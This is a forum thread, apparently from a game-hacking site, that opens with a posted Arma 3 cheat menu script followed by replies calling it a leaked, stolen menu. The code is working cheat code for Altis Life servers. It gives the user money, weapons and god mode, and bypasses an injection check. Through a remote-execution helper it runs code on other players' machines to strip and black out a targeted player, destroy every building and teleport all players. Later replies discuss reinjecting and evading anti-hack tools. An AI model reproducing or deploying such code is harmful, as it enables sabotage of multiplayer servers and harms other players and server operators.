    DurkSintax_EscortPlayer={hint"Escort Player Cursor Target Enabled!";cutText ["Escort Player Cursor Target Enabled!","PLAIN"];cutText[format["Escort Player Cursor Target Enabled"],"PLAIN DOWN"];cursorTarget attachTo [player,[0.1,1.1,0]];cursorTarget setVariable["transporting",false,true];cursorTarget setVariable["Escorting",true,true];};
    DurkSintax_StopEscortPlayer={hint"Stop Escort Player Cursor Target Enabled!";cutText ["Stop Escort Player Cursor Target Enabled!","PLAIN"];cutText[format["Stop Escort Player Cursor Target Enabled"],"PLAIN DOWN"];detach cursorTarget;cursorTarget setVariable["Escorting",false,true];cursorTarget setVariable["restrained",FALSE,TRUE];};
    DurkSintax_GetTargetKey={hint"Keys Of Target Enabled!";cutText ["Keys Of Target Enabled!","PLAIN"];cutText[format["Keys Of Target Enabled"],"PLAIN DOWN"];titleText["You now have keys to this vehicle.","PLAIN"]; life_vehicles set[count life_vehicles,cursorTarget];};
    DurkSintax_JailEscape={hint"Escape From Jail Enabled!";cutText ["Escape From Jail Enabled!","PLAIN"];cutText[format["Escape From Jail Enabled"],"PLAIN DOWN"];titleText["RUN RUN RUN !!! YOU'RE ESCAPE !!!","PLAIN"];hint "You have paid your bail and are now free.";serv_wanted_remove = [player];player setPos (getMarkerPos "jail_release");[[getPlayerUID player],"life_fnc_wantedRemove",false,false];}; 
    DurkSintax_JailTarget={hint"Jail Player Cursor Target Enabled!";cutText ["Jail Player Cursor Target Enabled!","PLAIN"];cutText[format["Jail Player Cursor Target Enabled"],"PLAIN DOWN"];cursorTarget setPos (getMarkerPos "jail_marker");};
    CrazyMotherFuckerDurkkkk_SpawnCrate={_l5=getdir vehicle player;_pos=getPos vehicle player;_pos=[(_pos select 0)+1.5*sin(_l5),(_pos select 1)+1.5*cos(_l5),0];_l50=createVehicle["box_NATO_AMMO_F",_pos,[],0,'CAN_COLLIDE'];clearWeaponCargo _l50;clearMagazineCargo _l50;clearItemCargo _l50;clearBackpackCargo _l50;_l51=configFile>>"CfgWeapons";_l52=[];for"_l39"from 0 to(count _l51)-1 do{_l53=_l51 select _l39;if(isClass _l53)then{_l3=configName _l53;_l54=getNumber(_l53>>"type");_l55=getNumber(_l53>>"scope");_l56=getText(_l53>>"picture");if(_l55>=2 && _l54 in[1,2,4,4096]&& _l56!=""&&!(_l3 in _l52)&& _l3!="NVGoggles")then{_l52 set[count _l52,_l3];};};if(_l39 % 10==0)then{hintsilent format["Spawning Weapons %1",count _l52];sleep 0.0001;};};sleep 0.1;_l51=configFile>>"CfgMagazines";_l57=[];for"_l39"from 0 to(count _l51)-1 do{_l53=_l51 select _l39;if(isClass _l53)then{_l3=configName _l53;_l55=getNumber(_l53>>"scope");_l56=getText(_l53>>"picture");if(_l55>=2 && _l56!=""&&!(_l3 in _l57))then{_l57 set[count _l57,_l3];};};if(_l39 % 10==0)then{hintsilent format["Spawning Mags %1",count _l57];sleep 0.0001;};};{_l50 addWeaponCargo[_x,50];}foreach _l52;{_l50 addMagazineCargo[_x,50];}foreach _l57;sleep 0.1;_l51=configFile>>"CfgWeapons";_l58=[];for"_l39"from 0 to(count _l51)-1 do{_l53=_l51 select _l39;if(isClass _l53)then{_l3=configName _l53;_l54=getNumber(_l53>>"type");_l55=getNumber(_l53>>"scope");_l56=getText(_l53>>"picture");if(_l55>=2 && _l54 in[131072,4096]&& _l56!=""&&!(_l3 in _l58)&& _l3!="Binocular")then{_l58 set[count _l58,_l3];};};if(_l39 % 10==0)then{hintsilent format["Spawning Items %1",count _l58];sleep 0.0001;};};{_l50 addItemCargo[_x,50];}foreach _l58;sleep 0.1;_l51=configFile>>"CfgVehicles";_l59=[];for"_l39"from 0 to(count _l51)-1 do{_l53=_l51 select _l39;if(isClass _l53)then{_l3=configName _l53;_l54=getText(_l53>>"vehicleClass");_l55=getNumber(_l53>>"scope");_l56=getText(_l53>>"picture");if(_l55>=2 && _l54=="Backpacks"&& _l56!=""&&!(_l3 in _l59))then{_l59 set[count _l59,_l3];};};if(_l39 % 10==0)then{hintsilent format["Spawning Backpacks %1",count _l59];sleep 0.0001;};};{_l50 addBackPackCargo[_x,5];}foreach _l59;sleep 0.1;hint"Weapon Crate Ready";titleText["    \nCrate Spawned..","PLAIN"];titlefadeout 5;};
    CrazyMotherFuckerDurkkkk_DelCrate={{deleteVehicle _x}forEach(allMissionObjects"box_NATO_AMMO_F");hint"All Weapon Boxes Deleted";};
    LoudoutIrecommend_PDWP = {[] spawn {_wset = player;removeAllWeapons _wset;removeAllItems _wset;removebackpack _wset;removeAllAssignedItems _wset;_wset addHeadgear "H_Beret_02";_wset addGoggles "G_Sport_Blackred";_wset ForceaddUniform "U_OrestesBody";_wset addVest "V_BandollierB_cbr";_wset addBackpack "B_Carryall_ocamo";_wset addWeapon "NVGoggles";_wset addWeapon "Rangefinder";_wset addMagazine "30Rnd_9x21_Mag";_wset addweapon "hgun_PDW2000_Holo_snds_F";_wset addMagazine "6Rnd_45ACP_Cylinder";_wset addweapon "hgun_Pistol_heavy_02_Yorris_F";_wset addMagazine "NLAW_F";_wset addweapon "launch_NLAW_F";_wset addPrimaryWeaponItem "muzzle_snds_B";_wset addPrimaryWeaponItem "acc_pointer_IR";_wset addWeaponGlobal "ItemCompass";_wset addWeaponGlobal "ItemMap";_wset addWeaponGlobal "Itemgps";_wset addWeaponGlobal "ItemWatch";_wset addWeaponGlobal "itemradio";(unitBackpack _wset) additemCargo["FirstAidKit", 2];(unitBackpack _wset) additemCargo["30Rnd_9x21_Mag", 9];(unitBackpack _wset) additemCargo["6Rnd_45ACP_Cylinder", 9];(unitBackpack _wset) additemCargo["handGrenade", 2];(unitBackpack _wset) additemCargo["NLAW_F", 2];hint "PDW Loadout";};};
    LoudoutIrecommend_LRRP = {[] spawn {_wset = player;removeAllWeapons _wset;removeAllItems _wset;removebackpack _wset;removeAllAssignedItems _wset;_wset addGoggles "G_Sport_Blackred";_wset ForceaddUniform "U_O_CombatUniform_oucamo";_wset addVest "V_BandollierB_cbr";_wset addBackpack "B_Carryall_oucamo";_wset addWeapon "NVGoggles";_wset addWeapon "Rangefinder";_wset addMagazine "7Rnd_408_Mag";_wset addweapon "srifle_LRR_LRPS_F";_wset addMagazine "30Rnd_9x21_Mag";_wset addweapon "hgun_P07_F";_wset addMagazine "NLAW_F";_wset addweapon "launch_NLAW_F";_wset addPrimaryWeaponItem "acc_pointer_IR";_wset addHandgunItem "muzzle_snds_L";_wset addWeaponGlobal "ItemCompass";_wset addWeaponGlobal "ItemMap";_wset addWeaponGlobal "Itemgps";_wset addWeaponGlobal "ItemWatch";_wset addWeaponGlobal "itemradio";(unitBackpack _wset) additemCargo["FirstAidKit", 2];(unitBackpack _wset) additemCargo["7Rnd_408_Mag", 9];(unitBackpack _wset) additemCargo["30Rnd_9x21_Mag", 9];(unitBackpack _wset) additemCargo["handGrenade", 2];(unitBackpack _wset) additemCargo["NLAW_F", 2];hint "fuck yeah";};};
    LoudoutIrecommend_DMRP = {[] spawn {_wset = player;removeAllWeapons _wset;removeAllItems _wset;removebackpack _wset;removeAllAssignedItems _wset;_wset addHeadgear "H_Beret_02";_wset addGoggles "G_Sport_Blackred";_wset ForceaddUniform "U_O_GhillieSuit";_wset addVest "V_BandollierB_cbr";_wset addBackpack "B_Carryall_ocamo";_wset addWeapon "NVGoggles";_wset addWeapon "Rangefinder";_wset addMagazine "10Rnd_762x51_Mag";_wset addweapon "srifle_DMR_01_DMS_F";_wset addMagazine "30Rnd_9x21_Mag";_wset addweapon "hgun_P07_F";_wset addMagazine "NLAW_F";_wset addweapon "launch_NLAW_F";_wset addPrimaryWeaponItem "acc_pointer_IR";_wset addHandgunItem "muzzle_snds_L";_wset addWeaponGlobal "ItemCompass";_wset addWeaponGlobal "ItemMap";_wset addWeaponGlobal "Itemgps";_wset addWeaponGlobal "ItemWatch";_wset addWeaponGlobal "itemradio";(unitBackpack _wset) additemCargo["FirstAidKit", 2];(unitBackpack _wset) additemCargo["10Rnd_762x51_Mag", 9];(unitBackpack _wset) additemCargo["30Rnd_9x21_Mag", 9];(unitBackpack _wset) additemCargo["handGrenade", 2];(unitBackpack _wset) additemCargo["NLAW_F", 2];hint "DMR Loadout";};};
    LoudoutIrecommend_HEAVYP = {[] spawn {_wset = player;removeAllWeapons _wset;removeAllItems _wset;removebackpack _wset;removeAllAssignedItems _wset;_wset addHeadgear "H_Beret_02";_wset addGoggles "G_Sport_Blackred";_wset ForceaddUniform "U_OG_leader";_wset addVest "V_BandollierB_cbr";_wset addBackpack "B_Carryall_ocamo";_wset addWeapon "NVGoggles";_wset addWeapon "Rangefinder";_wset addMagazine "150Rnd_762x51_Box_Tracer";_wset addweapon "LMG_Zafir_pointer_F";_wset addMagazine "30Rnd_9x21_Mag";_wset addweapon "hgun_P07_F";_wset addMagazine "NLAW_F";_wset addweapon "launch_NLAW_F";_wset addPrimaryWeaponItem "optic_LRPS";_wset addPrimaryWeaponItem "acc_pointer_IR";_wset addHandgunItem "muzzle_snds_L";_wset addWeaponGlobal "ItemCompass";_wset addWeaponGlobal "ItemMap";_wset addWeaponGlobal "Itemgps";_wset addWeaponGlobal "ItemWatch";_wset addWeaponGlobal "itemradio";(unitBackpack _wset) additemCargo["FirstAidKit", 2];(unitBackpack _wset) additemCargo["150Rnd_762x51_Box_Tracer", 9];(unitBackpack _wset) additemCargo["30Rnd_9x21_Mag", 9];(unitBackpack _wset) additemCargo["handGrenade", 2];(unitBackpack _wset) additemCargo["NLAW_F", 2];hint "Light Machine Gun Loadout";};};
    LoudoutIrecommend_EBRP = {[] spawn {_wset = player;removeAllWeapons _wset;removeAllItems _wset;removebackpack _wset;removeAllAssignedItems _wset;_wset addHeadgear "H_Beret_02";_wset addGoggles "G_Sport_Blackred";_wset ForceaddUniform "U_O_GhillieSuit";_wset addVest "V_BandollierB_cbr";_wset addBackpack "B_Carryall_ocamo";_wset addWeapon "NVGoggles";_wset addWeapon "Rangefinder";_wset addMagazine "20rnd_762x51_mag";_wset addweapon "srifle_ebr_f";_wset addMagazine "30Rnd_9x21_Mag";_wset addweapon "hgun_P07_F";_wset addMagazine "NLAW_F";_wset addweapon "launch_NLAW_F";_wset addPrimaryWeaponItem "optic_sos";_wset addPrimaryWeaponItem "muzzle_snds_B";_wset addPrimaryWeaponItem "acc_pointer_IR";_wset addHandgunItem "muzzle_snds_L";_wset addWeaponGlobal "ItemCompass";_wset addWeaponGlobal "ItemMap";_wset addWeaponGlobal "Itemgps";_wset addWeaponGlobal "ItemWatch";_wset addWeaponGlobal "itemradio";(unitBackpack _wset) additemCargo["FirstAidKit", 2];(unitBackpack _wset) additemCargo["20rnd_762x51_mag", 9];(unitBackpack _wset) additemCargo["30Rnd_9x21_Mag", 9];(unitBackpack _wset) additemCargo["handGrenade", 2];(unitBackpack _wset) additemCargo["NLAW_F", 2];hint "EBR Loadout";};};
    LoudoutIrecommend_MXMP = {[] spawn {_wset = player;removeAllWeapons _wset;removeAllItems _wset;removebackpack _wset;removeAllAssignedItems _wset;_wset addHeadgear "H_Beret_02";_wset addGoggles "G_Sport_Blackred";_wset ForceaddUniform "U_IG_Guerilla3_1";_wset addVest "V_BandollierB_cbr";_wset addBackpack "B_Carryall_ocamo";_wset addWeapon "NVGoggles";_wset addWeapon "Rangefinder";_wset addMagazine "30Rnd_65x39_caseless_mag_Tracer";_wset addweapon "arifle_MXM_Black_F";_wset addMagazine "11Rnd_45ACP_Mag";_wset addweapon "hgun_Pistol_heavy_01_MRD_F";_wset addMagazine "NLAW_F";_wset addweapon "launch_NLAW_F";_wset addPrimaryWeaponItem "optic_MRCO";_wset addPrimaryWeaponItem "muzzle_snds_M";_wset addPrimaryWeaponItem "acc_pointer_IR";_wset addWeaponGlobal "ItemCompass";_wset addWeaponGlobal "ItemMap";_wset addWeaponGlobal "Itemgps";_wset addWeaponGlobal "ItemWatch";_wset addWeaponGlobal "itemradio";(unitBackpack _wset) additemCargo["FirstAidKit", 2];(unitBackpack _wset) additemCargo["30Rnd_65x39_caseless_mag_Tracer", 9];(unitBackpack _wset) additemCargo["11Rnd_45ACP_Mag", 9];(unitBackpack _wset) additemCargo["handGrenade", 2];(unitBackpack _wset) additemCargo["NLAW_F", 2];hint "MXM Loadout";};};
    LoudoutIrecommend_TRGP = {[] spawn {_wset = player;removeAllWeapons _wset;removeAllItems _wset;removebackpack _wset;removeAllAssignedItems _wset;_wset addHeadgear "H_Beret_02";_wset addGoggles "G_Sport_Blackred";_wset ForceaddUniform "U_IG_Guerilla3_1";_wset addVest "V_BandollierB_cbr";_wset addBackpack "B_Carryall_ocamo";_wset addWeapon "NVGoggles";_wset addWeapon "Rangefinder";_wset addMagazine "30Rnd_556x45_Stanag";_wset addweapon "arifle_TRG21_ACO_pointer_F";_wset addMagazine "30Rnd_9x21_Mag";_wset addweapon "hgun_P07_F";_wset addMagazine "NLAW_F";_wset addweapon "launch_NLAW_F";_wset addPrimaryWeaponItem "optic_Aco";_wset addPrimaryWeaponItem "muzzle_snds_M";_wset addHandgunItem "muzzle_snds_L";_wset addWeaponGlobal "ItemCompass";_wset addWeaponGlobal "ItemMap";_wset addWeaponGlobal "Itemgps";_wset addWeaponGlobal "ItemWatch";_wset addWeaponGlobal "itemradio";(unitBackpack _wset) additemCargo["FirstAidKit", 2];(unitBackpack _wset) additemCargo["30Rnd_556x45_Stanag", 9];(unitBackpack _wset) additemCargo["30Rnd_9x21_Mag", 9];(unitBackpack _wset) additemCargo["handGrenade", 2];(unitBackpack _wset) additemCargo["NLAW_F", 2];hint "TAR Loadout";};};
    LoudoutIrecommend_UNDERWATERP = {[] spawn {_wset = player;removeAllWeapons _wset;removeAllItems _wset;removebackpack _wset;removeAllAssignedItems _wset;_wset addHeadgear "H_Beret_02";_wset addGoggles "G_Diving";_wset addUniform "U_I_Wetsuit";_wset addVest "V_RebreatherB";_wset addBackpack "B_AssaultPack_blk_DiverExp";_wset addWeapon "Rangefinder";_wset addMagazine "30Rnd_556x45_Stanag_Tracer_Red";_wset addweapon "arifle_SDAR_F";_wset addMagazine "30Rnd_9x21_Mag";_wset addweapon "hgun_P07_F";_wset addPrimaryWeaponItem "muzzle_snds_B";_wset addPrimaryWeaponItem "acc_pointer_IR";_wset addHandgunItem "muzzle_snds_L";_wset addWeaponGlobal "ItemCompass";_wset addWeaponGlobal "ItemMap";_wset addWeaponGlobal "Itemgps";_wset addWeaponGlobal "ItemWatch";_wset addWeaponGlobal "itemradio";(unitBackpack _wset) additemCargo["FirstAidKit", 2];(unitBackpack _wset) additemCargo["30Rnd_556x45_Stanag_Tracer_Red", 9];(unitBackpack _wset) additemCargo["30Rnd_9x21_Mag", 9];(unitBackpack _wset) additemCargo["handGrenade", 2];(unitBackpack _wset) additemCargo["NLAW_F", 2];hint "Underwater Loadout";};};
    LoudoutIrecommend_ALTISP = {_wset = player;removeallweapons _wset;removeVest _wset;_wset addVest "V_Rangemaster_belt";removebackpack _wset;removeuniform _wset;_wset ForceaddUniform "U_Rangemaster";_wset addWeapon "hgun_P07_snds_F";player addWeapon "Binocular";_magazines = getArray(configFile >> "CfgWeapons" >> "hgun_P07_snds_F" >> "magazines");{player addmagazine _x;player addmagazine _x;player addmagazine _x;player addmagazine _x;}foreach _magazines;reload player;};
    SpawwwnnnIrecommmmEnDndNd_JetBus = {hint "Quad-Train V1";_dirme = getDir player;_pos = player modelToWorld[0, 20, 0.2];Stolen_jetslut = "B_Plane_CAS_01_F"createVehicle _pos;Stolen_jetslut allowDamage false;Stolen_jetslut setDir _dirme;[Stolen_jetslut] call DurkSintax_Pro_RE;_N3rdDrDrDrD = "O_Quadbike_01_F"createVehicle _pos;_N3rdDrDrDrD attachTo[Stolen_jetslut, [2.7, 4, 0]];_N3rdDrDrDrD allowDamage false;_N3rdDrDrDrD = "O_Quadbike_01_F"createVehicle _pos;_N3rdDrDrDrD attachTo[Stolen_jetslut, [-2.7, 4, 0]];_N3rdDrDrDrD allowDamage false;_N3rdDrDrDrD = "O_Quadbike_01_F"createVehicle _pos;_N3rdDrDrDrD attachTo[Stolen_jetslut, [2.7, 8, 0]];_N3rdDrDrDrD allowDamage false;_N3rdDrDrDrD = "O_Quadbike_01_F"createVehicle _pos;_N3rdDrDrDrD attachTo[Stolen_jetslut, [-2.7, 8, 0]];_N3rdDrDrDrD allowDamage false;_N3rdDrDrDrD = "O_Quadbike_01_F"createVehicle _pos;_N3rdDrDrDrD attachTo[Stolen_jetslut, [2.7, 12, 0]];_N3rdDrDrDrD allowDamage false;_N3rdDrDrDrD = "O_Quadbike_01_F"createVehicle _pos;_N3rdDrDrDrD attachTo[Stolen_jetslut, [-2.7, 12, 0]];_N3rdDrDrDrD allowDamage false;[_N3rdDrDrDrD] call DurkSintax_Pro_RE;};
    IrEeEeEeComMMMenNEnd_IrEeEeEeComMMMenNEnd_aE5Pj = {if (isNil "IrEeEeEeComMMMenNEnd_aE5Pj") then {IrEeEeEeComMMMenNEnd_aE5Pj = 0;};if (IrEeEeEeComMMMenNEnd_aE5Pj == 0) then {IrEeEeEeComMMMenNEnd_aE5Pj = 1;hint "E5P Enabled";_dist = 1000;_IrEeEeEeComMMMenNEnd_aE5Pjfnc = format["if !(isServer) then{[] spawn{IrEeEeEeComMMMenNEnd_aE5Pjfnc ={disableSerialization;if (isNil ""BIS_fnc_3dCredits_n"") then {BIS_fnc_3dCredits_n = 2733;};				BIS_fnc_3dCredits_n cutRsc [""rscDynamicText"", ""PLAIN""];BIS_fnc_3dCredits_n = BIS_fnc_3dCredits_n + 1;_ctrl = ((uiNamespace getvariable ""BIS_dynamicText"") displayctrl 9999);_ctrl ctrlShow true; _ctrl ctrlEnable true; _ctrl ctrlSetFade 0;_unit = _this select 0;while {(alive _unit) && ((player distance _unit) < %1)} do{if !(aIrEeEeEeComMMMenNEnd_ptagsSS) exitWith {};_pos = [(getPosATL _unit) select 0, (getPosATL _unit) select 1, ((getPosATL _unit) select 2) + 2];_pos2D = worldToScreen _pos;if (count _pos2D > 0) then{_ctrl ctrlSetPosition [(_pos2D select 0) - (safezoneW / 2), (_pos2D select 1), safezoneW, safezoneH];_text = parseText (""<t size='0.35' color='#FF1AAA'>""+(name _unit)+""(""+(str(round (player distance _unit)))+""m)</t>"");_ctrl ctrlSetStructuredText _text;_ctrl ctrlCommit 0;};};_ctrl ctrlShow false;_ctrl ctrlEnable false;};};};", _dist];[_IrEeEeEeComMMMenNEnd_aE5Pjfnc] call DurkSintax_Pro_RE;sleep 3;_E5Prun = format["if !(isServer) then	{[] spawn{_a = [];aIrEeEeEeComMMMenNEnd_ptagsSS = true;while {aIrEeEeEeComMMMenNEnd_ptagsSS} do{_count = count ((position player) nearEntities [[""CAManBase""], %1]);{if (((_x in _a) && !(alive _x)) or ((_x in _a) && ((player distance _x) > %1))) then {_a = _a - [_x];};if ((_x != player) && (getPlayerUID _x != """") && (name _x != """") && !(_x in _a) && ((player distance _x) < %1)) then{_a = _a + [_x];[_x] spawn IrEeEeEeComMMMenNEnd_aE5Pjfnc;sleep 1;};} forEach playableUnits;waitUntil {_count != count ((position player) nearEntities [[""CAManBase""], %1])};};};};", _dist];[_E5Prun] call DurkSintax_Pro_RE;} else {IrEeEeEeComMMMenNEnd_aE5Pj = 0;hint "E5P Disabled";_IrEeEeEeComMMMenNEnd_aE5Pj = "aIrEeEeEeComMMMenNEnd_ptagsSS = false;";[_IrEeEeEeComMMMenNEnd_aE5Pj] call DurkSintax_Pro_RE;};};
    IreCoMMmeNEnNDNdnNDEASD_JesuseMode_a = {_l34 = call IreCoMMmeNEnNDNdnNDEASD_List;hint "Globaler GodMode aktiviert";_l109 = format["if!(getPlayerUID player in %1)then{player removeAllEventHandlers'handleDamage';player addEventHandler['handleDamage',{false}];player allowDamage false;};", _l34];while {Jesusall == 1}do {[_l109] call DurkSintax_Pro_RE;sleep 30;};};
    IreCoMMmeNEnNDNdnNDEASD_JesuseModeOff_a = {_l34 = call IreCoMMmeNEnNDNdnNDEASD_List;hint "Globaler GodMode deaktiviert";_l109 = format["if!(getPlayerUID player in %1)then{player addEventHandler['handleDamage',{true}];player removeAllEventHandlers'handleDamage';player allowDamage true;};", _l34];[_l109] call DurkSintax_Pro_RE;};
    IreCoMMmeNEnNDNdnNDEASD_TimeD = {IreCoMMmeNEnNDNdnNDEASD_toRE_cus = "if(isServer) then {while {true} do {setDate [2012, 9, 1, 13, 0];};};";[IreCoMMmeNEnNDNdnNDEASD_toRE_cus] call DurkSintax_Pro_RE;hint "Time: Day.....";};
    IreCoMMmeNEnNDNdnNDEASD_TimeN = {IreCoMMmeNEnNDNdnNDEASD_toRE_cuss = "if(isServer) then {while {true} do {setDate [2012, 9, 1, 23, 0];};};";[IreCoMMmeNEnNDNdnNDEASD_toRE_cuss] call DurkSintax_Pro_RE;hint "Time: Night....";};
    IreCoMMmeNEnNDNdnNDEASD_TPAll_a = {_pos = getPosATL player;_l107 = format["if(isServer)then{{(vehicle _x)setPos[(%1 select 0)+random 5,(%1 select 1)+random 5,%1 select 2];}forEach playableUnits;};", _pos];[_l107] call DurkSintax_Pro_RE;};
    Ddasdaw_AL_NoIllegal = {life_illegal_items = [];["TaskSucceeded", ["", "Du hast nun keine Illegale Items!"]] call bis_fnc_showNotification;};
    DafuqDukleinerfischkopf_AL_NoWeight = {if (DafuqDukleinerfischkopf_AL_NoWeight_toggle) then {["TaskSucceeded", ["", "Du hast nun kein Miximal gewicht!!"]] call bis_fnc_showNotification;while {DafuqDukleinerfischkopf_AL_NoWeight_toggle}do {life_maxWeight = 1000000000000000000;life_maxWeightT = 1000000000000000000;life_carryWeight = 0;};} else {["TaskSucceeded", ["", "Maximal gewicht zurückgesetzt!!"]] call bis_fnc_showNotification;life_maxWeight = 24;life_maxWeightT = 24;life_carryWeight = 0;};};
    INukeReaper_Invisable = {INukeReaper_PLAYERLOL = vehicle player;publicvariable "INukeReaper_PLAYERLOL";if (isNil "INukeReaper_MeSideways") then {INukeReaper_MeSideways = 0;};if (INukeReaper_MeSideways == 0) then {INukeReaper_MeSideways = 1;hint "Invisibility ON";} else {INukeReaper_MeSideways = 0;hint "Invisibility OFF";};if (INukeReaper_MeSideways == 1) then {_l227 = "INukeReaper_PLAYERLOL hideObject true;";[_l227] call DurkSintax_Pro_RE;} else {_l227 = "INukeReaper_PLAYERLOL hideObject false;";[_l227] call DurkSintax_Pro_RE;};};
    ILuisReaper_heal_t = {_l23 = name cursorTarget;if (!(isNil "Arma3_GUI_R") or!(isNil "arma3_originalPlayer")) then {_l100 = format["if(name player=='%1')then{r_player_handler=false;r_player_handler1=false;r_player_dead=false;r_player_unconscious=false;r_player_infected=false;r_player_injured=false;r_player_inpain=false;r_player_loaded=false;r_player_cardiac=false;r_fracture_legs=false;r_fracture_arms=false;r_player_blood=12000;r_player_lowblood=false;r_player_timeout=0;r_handlerCount=0;dayz_hunger=0;dayz_thirst=0;dayz_temperatur=42;player setDamage 0;vehicle player setDamage 0;};", _l23];[_l100] call DurkSintax_Pro_RE;} else {_l100 = format["if(name player=='%1')then{player setDamage 0;vehicle player setDamage 0;};", _l23];[_l100] call DurkSintax_Pro_RE;};hint format["Healing %1", _l23];cutText[format["Healing %1", _l23], "PLAIN DOWN"];};
    MoIOoOonster_FuckUp_t = {_l23 = name cursorTarget;_l101 = format["if(name player=='%1')then{startLoadingScreen['You Got Fucked Up'];removeAllWeapons player;removeuniform player;removevest player;removeAllItems player;removeBackpack player;0 fadeSound 0;_l42=player;for'_l39'from 0 to 100 do{(findDisplay _l39)closeDisplay 0;};};", _l23];[_l101] call DurkSintax_Pro_RE;hint format["%1 Fucked UP", _l23];cutText[format["%1 Fucked UP", _l23], "PLAIN DOWN"];};
    WasdFasd_Target_Loadout = {_l23 = name cursorTarget;_l24 = format["if(name player=='%1')then{_wset = player;removeAllWeapons _wset;removeAllItems _wset;removebackpack _wset;removeAllAssignedItems _wset;_wset addHeadgear 'H_Beret_02';_wset addGoggles 'G_Sport_Blackred';_wset ForceaddUniform 'U_O_GhillieSuit';_wset addVest 'V_BandollierB_cbr';_wset addBackpack 'B_Carryall_ocamo';_wset addWeapon 'NVGoggles';_wset addWeapon 'Rangefinder';_wset addMagazine '10Rnd_762x51_Mag';_wset addweapon 'srifle_DMR_01_DMS_F';_wset addMagazine '30Rnd_9x21_Mag';_wset addweapon 'hgun_P07_F';_wset addPrimaryWeaponItem 'acc_pointer_IR';_wset addHandgunItem 'muzzle_snds_L';_wset addWeaponGlobal 'ItemCompass';_wset addWeaponGlobal 'ItemMap';_wset addWeaponGlobal 'Itemgps';_wset addWeaponGlobal 'ItemWatch';_wset addWeaponGlobal 'itemradio';(unitBackpack _wset) additemCargo ['FirstAidKit',2];(unitBackpack _wset) additemCargo ['10Rnd_762x51_Mag', 9];(unitBackpack _wset) additemCargo ['30Rnd_9x21_Mag', 9];(unitBackpack _wset) additemCargo ['handGrenade', 2];};", _l23];[_l24] call DurkSintax_Pro_RE;hint format["executed on %1", _l23];cutText[format["executed on %1", _l23], "PLAIN DOWN"];};
    Spyglassistschlecht_Cash_1mill_t = {_l23 = name cursorTarget;hint format["Money Given to %1", _l23];_l97 = format["if(!isNil 'life_no_injection') then {life_no_injection = true;};life_cash = life_cash + 500000;if(!isNil 'life_no_injection') then {life_no_injection = false;};", _l23];[_l97] call DurkSintax_Pro_RE;};
    Spyglassistschlecht_Cash_1mill = {if(!isNil "life_no_injection") then {life_no_injection = true;};life_cash = life_cash + 1000000;if(!isNil "life_no_injection") then {life_no_injection = false;};};
    Spyglassistschlecht_Cash_5mill = {if(!isNil "life_no_injection") then {life_no_injection = true;};life_cash = life_cash + 5000000;if(!isNil "life_no_injection") then {life_no_injection = false;};hint "5 Milli";};
    Irecommend_MegaDesync={_l34=nearestObjects[position player,["BUILDING"],999999];_l103='_l35=playableUnits;_l38=count _l35;_l39=0;for"_l39"from 0 to _l38 do{_l73=_l35 select _l39;if(player!=_l73)then{{_x setDamage 1;}forEach _l34;};};';[_l103]call DurkSintax_Pro_RE;};
    IrEcOCMmeNEnd_God_MODE={if(!(isNil"Dayz_GUI_R")or!(isNil"dayz_originalPlayer"))then{if(isNil"IrEcOCMmeNEnd_God_ModeLOL")then{IrEcOCMmeNEnd_God_ModeLOL=true;};if(IrEcOCMmeNEnd_God_ModeLOL)then{IrEcOCMmeNEnd_God_ModeLOL=false;hint"GOD ON";cutText[format["GOD ON"],"PLAIN"];_l32=player;fnc_usec_damageHandler=nil;fnc_usec_unconscious=nil;_l32 removeAllEventHandlers"handleDamage";_l33=false;_l32 addEventHandler["handleDamage",{}];_l32 allowDamage false;}else{IrEcOCMmeNEnd_God_ModeLOL=true;hint"GOD OFF";cutText[format["GOD OFF"],"PLAIN"];fnc_usec_damageHandler=compile preprocessFileLineNumbers"\z\addons\dayz_code\compile\fn_damageHandler.sqf";fnc_usec_unconscious=compile preprocessFileLineNumbers"\z\addons\dayz_code\compile\fn_unconscious.sqf";player removeAllEventHandlers"handleDamage";player addEventHandler["handleDamage",{true}];player allowDamage true;};}else{if(isNil"IrEcOCMmeNEnd_G0d_Mode")then{IrEcOCMmeNEnd_G0d_Mode=0;};if(IrEcOCMmeNEnd_G0d_Mode==0)then{IrEcOCMmeNEnd_G0d_Mode=1;hint"GOD ON";cutText[format["GOD ON"],"PLAIN"];fnc_usec_damageHandler={};fnc_usec_unconscious={};player removeAllEventHandlers"handleDamage";player addEventHandler["handleDamage",{false}];player allowDamage false;}else{IrEcOCMmeNEnd_G0d_Mode=0;hint"GOD OFF";cutText[format["GOD OFF"],"PLAIN"];player addEventHandler["handleDamage",{true}];player removeAllEventHandlers"handleDamage";player allowDamage true;};};};
    IrEcOCMmeNEnd_so_fly={_pos=getPos Player;_pos=[_pos select 0,_pos select 1,-100];_l43=(vehicle player);if(true)then{_l43 setPosASL _pos;};_pos=[_this select 0,_this select 1,_this select 2];_pos=[_this select 0,_this select 1,(getTerrainHeightASL _pos)-0.5];if(true)then{_l43 setPosASL _pos;};onMapSingleClick"";openMap[false,false];vehicle player setVelocity [0,0,2];};

  2. #2
    MekhAq's Avatar
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    Oct 2014
    Wow you leaked bobster's menu. Good job. Asshole.

  3. #3
    MiriwethV2's Avatar
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    Lel. I created it long time ago it was my first menü

  4. #4
    MekhAq's Avatar
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    Yeah okay sure. It's definitely not a skidded menu that was stolen from bobster.

  5. #5
    itsme0's Avatar
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    This is a leak. remove pls

  6. #6
    candybox's Avatar
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    Quote Originally Posted by itsme0 View Post
    This is a leak. remove pls

    Works fantastic, if its a leak then who do I pay to get the current version/support

  7. #7
    Khyy's Avatar
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    Quote Originally Posted by candybox View Post
    Works fantastic, if its a leak then who do I pay to get the current version/support
    Haha this guy.

  8. #8
    SSherman30's Avatar
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    nice fucking menu buddy lol

  9. #9
    Jme's Avatar
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    Yet another noob scroll menu. Why do people remove an action before adding it? I thought we were past this bs lol

    Also, is that the miriweth who was selling Lystics dialog with my scripts and calling it 'miriweth menu'
    Last edited by Jme; 11-17-2014 at 05:43 AM.

  10. #10
    furiouswai's Avatar
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    Quote Originally Posted by Jme View Post
    Yet another noob scroll menu. Why do people remove an action before adding it?
    To make sure it does not get added multiple times in case of reinjecting, etc.

    Most AH including infistarA3 remove all display event handlers from the default display (46) on loop, so the keybinds in this will not work on antihack servers.

  11. #11
    Jme's Avatar
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    Quote Originally Posted by furiouswai View Post
    To make sure it does not get added multiple times in case of reinjecting, etc.

    Most AH including infistarA3 remove all display event handlers from the default display (46) on loop, so the keybinds in this will not work on antihack servers.
    Funnily enough, i already posted a scroll menu template that noobs like this can use so they don't get errors trying to remove an action that doesn't exist.

    I also released an undetected keybind, but tards will be tards *sigh*

